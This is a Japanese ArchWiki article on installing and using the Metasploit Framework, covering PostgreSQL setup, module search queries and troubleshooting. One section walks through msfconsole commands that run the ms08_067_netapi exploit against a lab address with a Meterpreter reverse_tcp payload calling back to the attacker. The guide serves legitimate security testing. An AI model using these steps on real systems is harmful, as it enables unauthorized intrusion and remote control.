Metasploit Framework

提供: ArchWiki
移動先: 案内検索

公式サイト より:

今日セキュリティの専門家がフリーに使える最も便利な検査ツールといったら MSF しかありません。豊富な商用グレードの exploit と強力な exploit 開発環境、幅広いネットワークの情報収集ツールとウェブの脆弱性発見プラグイン。Metasploit Framework は真に優れた作業環境を提供します。MSF は単なる exploit のコレクションというのを越えて、様々なニーズに答えて利用ができるインフラストラクチャとなっています。車輪の再発明を避けて、あなたのためだけの環境に集中することができるでしょう。

現在、Metasploit を使うには対象環境に Postgresql をセットアップ・設定する必要があります。この記事では Postgresql データベースを使って metasploit を動作させる方法を説明します。

インストール

metasploit パッケージをインストールしてください。任意で以下の RVM の設定手順に従ってください。ruby は依存パッケージとしてインストールされます。

最新の開発版を使いたいときは、metasploit-gitAUR をインストールしてください。

Armitage

ArmitageJava で書かれた metasploit の GUI フロントエンドです。armitageAUR パッケージでインストールできます。

Armitage を実行する場合、#データベースの設定が必須になります。また、必ず ~/.msf4/database.yml ファイルを使う必要があります。

database.yml のファイルのサンプルは Armitage のパッケージに /usr/share/metasploit/database.yml.sample として含まれています。

RVM

Msfconsole は Ruby を必要とし、エラーなく動かすために多少の Ruby#RubyGems が必要になります。

RVM#RVM のインストールRVM#RVM を使う の記事に従って Ruby バージョン 2.3.1 をインストールしてデフォルトで使用するように設定してください。

設定が完了したら、新しく作成した RVM 環境を読み込みます:

$ source ~/.rvm/scripts/rvm

そして Ruby#Bundler を使って Msfconsole を動かすのに必要な gem を全てインストールしてください:

$ gem install bundler
$ bundle install
ノート: Ruby 2.3.1 よりも古いバージョンを使っていると metasploit-concern gem のインストールに失敗します。

データベースの設定

ノート: 以下、msfconsole から実行するコマンドには全て msf > を前に付けます。

Metasploit はデータベースがなくても使うことができますが、検索などのキャッシュを使用する操作がとても遅くなります。このセクションでは Metasploit の Postgresql データベースサーバーをセットアップする方法を説明します。

ノート: #Armitage フロントエンドを使用する場合、データベースの設定は必須です。

PostgreSQL の記事に従って msf という名前の新しいデータベースを作成してください。データベースの名前は何でもかまいませんが、この記事では msf ということにします。

msfconsole を起動して以下を入力:

msf > db_connect user@msf

user はデータベースの所有者の名前に置き換えてください (通常はあなたの Linux ユーザー名)。

データベースキャッシュを再生成:

msf > db_rebuild_cache

Metasploit はバックグラウンドでキャッシュを再生成するため、コマンドの実行中にも他のことができます。

ヒント: 初めてキャッシュを再生成するときは数分間はかかります。tophtop を実行することでキャッシュ生成の進捗を監視できます。生成中、Ruby/Postgres/Metasploit プロセスは CPU 時間を 50% まで占有します。

現在 Metasploit では msfconsole を起動するたびに db_connect コマンドを実行する必要があります。毎回このコマンドを入力するのが面倒くさい場合、シェルのスタートアップファイル (例: ~/.bashrc) に以下のエイリアスを追加してください:

alias msfconsole="msfconsole --quiet -x \"db_connect ${USER}@msf\""

quiet オプションは起動時の ASCII バナーを無効化して、-x コマンドは起動後すぐに指定されたコマンドを実行します。

.msf4 ディレクトリに database.yml ファイルを作成する方法もあります。例:

~/.msf4/database.yml
production:
 adapter: postgresql
 database: msf
 username: ${USER}
 password: ${PASS}
 host: localhost
 port: 5432
 pool: 5
 timeout: 5
ノート: データベースキャッシュを作成する必要があるのは一度だけです。その後は起動時に、msfconsole から [*] Rebuilding the module cache in the background... と表示されますが、実際には変更された部分だけが更新されます。データベースに何の変更も行われなかったときは、1秒もかかりません。

db_status を実行してデータベースの接続が正しく確立していることを確認してください:

msf > db_status
[*] postgresql connected to msf

使用方法

Metasploit では複数のインターフェイスが使えます。このセクションでは MSF の大抵の機能を使えるインターフェイスである msfconsole を利用する方法を説明します。

起動するには、msfconsole と入力してください。プロンプトが msf > に代わり、コマンドの入力を待機していることがわかります。

ヒント: 以下で説明している Metasploit コマンドに加え、標準のシェルコマンドやスクリプトに $PATH が通ります (エイリアスは除く)。

モジュールのタイプ

Metasploit ではあらゆるもの (スクリプト、ファイル、プログラムなど) がモジュールとなっています。6種類のモジュールが存在します:

  • auxiliary - ポートスキャンやバージョン検出、ネットワークトラフィックの解析など、攻撃者の様々な作業を補助するモジュール。
  • exploit - 脆弱性を利用して、バッファオーバーフローを起こしたり認証を迂回して、ペイロードの実行をできるようにするコード。
  • payload - リモート接続の確立や meterpreter セッションの開始、シェルコマンドの実行など、exploit が成功した後にすぐ実行すること。
  • post - exploit とリモート接続が成功した後に、パスワードを盗取したりキーロガーを設定、あるいはファイルをダウンロードするために実行する様々なプログラム。
  • encoder - 暗号化を実行するためのプログラム。
  • nop - NOP ジェネレータ。NOP は何もしないアセンブリ言語の命令です。この命令の機械語はハードウェアのアーキテクチャによって異なります。NOP 命令は実行可能ファイルの空白を埋めるのに有用です。

exploit の検索

ノート: 現在 search コマンドは正しく機能しません。詳しくは #データベースから検索 を参照。

対象のシステムで動いているオペレーティングシステムとソフトウェアのバージョンを調べるには、ポートスキャンを実行します。ポートスキャンの情報を使って、search コマンドで利用可能な exploit を検索することができます。

例えば、Novell の Linux プラットフォームの exploit を全て検索するには:

msf > search platform:linux type:exploit name:Novell

特定のフィールドを検索したいときは、フィールドの名前の後ろに、コロンと検索フレーズを入力します。以下の検索フィールドが使えます:

検索フィールド 説明 入力可能な値 DB テーブル & カラム
app Passive (client) あるいは Active (server) な exploit client, server module_details.stance
author モジュールの作者の名前とメールアドレス 何でも入力可能 module_authors.name
type モジュールのタイプ auxiliary, exploit, payload, post, encoder, nop module_details.mtype
name パス (Name) と短い説明 何でも入力可能 module_details.fullname, module_details.name
platform 対象ハードウェアあるいはソフトウェアプラットフォーム bsdi, netware, linux, hpux, irix, osx, bsd, platform, java, javascript, unix, php, firefox, nodejs, ruby, cisco, android, aix, windows, python, solaris module_platforms.name
bid, cve, edb, osvdb, ref Bugtraq, CVE, Exploit-DB, OSBDB ID など Exploit データベースのエントリ ID あるいは上流のレポート URL の一部 module_refs.name
(No field) 上記の apptype を除く全て 何でも入力可能 上記の全て

高度な検索方法は #データベースから検索#データベース検索のサンプル を見て下さい。

exploit を使う

適当な exploit を選択したら、ハッキングの時間です。

まず use コマンドを使って exploit を選択:

msf > use exploit/windows/smb/ms08_067_netapi
ノート: ms08_067_netapi は Windows XP と Windows Server 2003 の SMB サービスに影響を与える最も有名な exploit の一つです。2008年に公開された exploit で、ファイアウォールが無効になっていてパッチが適用されていないシステムなら、かなり確実に exploit することができます。

モジュールの情報を表示するには、info コマンドを使用:

msf exploit(ms08_067_netapi) > info exploit/windows/smb/ms08_067_netapi

何も引数を付けないで info を実行すると、現在選択されているモジュールの情報が表示されます。

選択した exploit のオプションを確認するには、次を実行:

msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

   ...

exploit する前に必要なフィールドを全て設定してください。上記の場合、RHOST 変数を指定する必要があります。変数に値を指定するには set コマンドを使います:

msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102

そしてペイロードを選択:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
ノート: Meterpreter は Metasploit に組み込まれたコマンドシェルで、攻撃者はこれを使って exploit されたシステムでリモートコマンドを実行することができます。exploit したコンピュータから exploit を仕掛けたコンピュータに接続を確立するときは Reverse TCP が使われます。

ペイロードを選択 (つまりモジュールを選択) するとオプションが増えます。もう一度 show options を実行してください:

msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.102   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

LHOST 変数にあなたのコンピュータのアドレスを指定してください。exploit されたコンピュータはそのアドレスに接続リクエストを送信します:

msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1

では攻撃を開始してください:

msf exploit(ms08_067_netapi) > exploit

上手く行けば、Meterpreter セッションが表示され、リモートコンピュータであらゆることができるようになります。

ヒントとテクニック

データベースから検索

Metasploit ではあらゆるものがデータベースに保存されるため、フロントエンドコマンドの search を使わなくても強力な検索を使うことが簡単にできます。

データベースインターフェイスを起動するには、次を実行:

$ psql msf

モジュールに関する情報は8つのテーブルに保存されています:

テーブル名 中身
module_details "メイン"のテーブルで、各モジュールの詳細情報が入っています。
module_actions auxiliary モジュールのアクション名。
module_archs 対象ハードウェアのアーキテクチャやソフトウェアのプラットフォーム
module_authors モジュールの作者の名前とメールアドレス。
module_mixins 空 (???)
module_platforms 対象オペレーティングシステム。#exploit の数によるプラットフォームの人気度 も参照。
module_refs 様々なオンラインの exploit データベースとレポートのリファレンス。
module_targets exploit 対象のプログラムの名前とバージョン。
ヒント: テーブルの情報を詳しく見たい場合は \d+ table_name を実行してください。例: \d+ module_details

ほとんどのテーブルには3つカラムがあります: id, detail_id, name。例外的に module_details テーブルは16のカラムがあります。

detail_id の値は module_details テーブルの行数のポインタです。

テーブルの中身を全て表示するには、次を実行:

SELECT * FROM table_name;

マルチ:

  • Architecture
  • Platform
  • Target

モジュールのオプション:

  • module type
  • stance
  • privileged
  • path
  • name
  • refname
  • rank
  • privileged
  • disclosure date

データベース検索のサンプル

module_details テーブルには複数のカラムがあり、全ての情報を一度に表示するのは得策ではありません。モジュールの基本的な情報だけを表示するには:

SELECT id, mtype, refname, disclosure_date, rank, stance, name
FROM module_details;

module_platforms のプラットフォーム情報を含む、利用可能なモジュールの情報を表示:

SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id;

Windows プラットフォームの全てのクライアント (aggressive) exploit を表示:

SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id
WHERE module_platforms.name = 'windows'
AND mtype = 'exploit'
AND stance = 'aggressive';

2013年以後に発表された rank >= 500 の Windows プラットフォーム用の exploit を全て表示:

SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id
WHERE module_platforms.name = 'windows'
AND mtype = 'exploit'
AND rank >= 500
AND disclosure_date >= TIMESTAMP '2013-1-1';

rank >= 500 の Windows プラットフォームの aggressive (client) exploit を全て表示、モジュールの対象情報も含む:

SELECT module_details.id, mtype, module_platforms.name as platform, module_details.name, DATE(disclosure_date), rank, module_targets.name as target
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id JOIN module_targets on module_details.id = module_targets.detail_id
WHERE module_platforms.name = 'windows'
AND mtype = 'exploit'
AND stance = 'aggressive'
AND rank >= 500
order by target;

exploit の数によるプラットフォームの人気度

利用可能な platform の値と、利用可能な exploit の数を調べるには、psql から以下を実行:

SELECT name, count(*)
FROM module_platforms
GROUP BY name
ORDER BY count DESC;

起動時の ASCII バナーを無効化

バナーを無効化するには、-q/--quiet 引数を付けて msfconsole を実行してください:

$ msfconsole --quiet

セッションが変わっても変数の値を維持する

他のモジュールを選択したときや msfconsole を再起動したときに変数がリセットされるのが気に食わない場合、setg で変数をグローバルに設定してください。例:

msf > setg RHOST 192.168.56.102

トラブルシューティング

VNC ビューアでクリックできない

ペイロードとして VNC ビューアを選択したときに、クリックができない、あるいは何もできない場合、ViewOnly 変数を false に設定するのを忘れています。この問題を修正するには、変数を false に設定してから exploit を再度実行してください:

msf > set ViewOnly false

cannot load such file -- robots (LoadError)

以下のようなエラーが表示される場合:

~/metasploit-framework/lib/metasploit/framework.rb:19:in `require': cannot load such file -- robots (LoadError)
    from ~/metasploit-framework/lib/metasploit/framework.rb:19:in `<top (required)>'
    from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'
    from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'
    from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'
    from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'
    from ~/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `const_get'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `block in constantize'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `each'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `constantize'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/core_ext/string/inflections.rb:54:in `constantize'
    from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'
    from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'
    from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'
    from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'
    from ./msfconsole:48:in `<main>'

このエラーは robots.rb ファイルのパーミッションが不適切で root ユーザーからしか読み取れなくなっているのが原因です (バグレポート を参照):

$ ls -l /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib
total 4
-rw-r----- 1 root root 3174 Oct 19 16:47 robots.rb

エラーを修正するには、誰からでも読み取れるようにパーミッションを変更してください:

# chmod o+r /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib/robots.rb

db_connect が何もエラーを表示しないで失敗する

db_connect の実行時に何も出力がされず、遅れて以下のようなメッセージが表示される場合:

[!] Database not connected or cache not built, using slow search

おそらく postgresql サービスが動いていません。

参照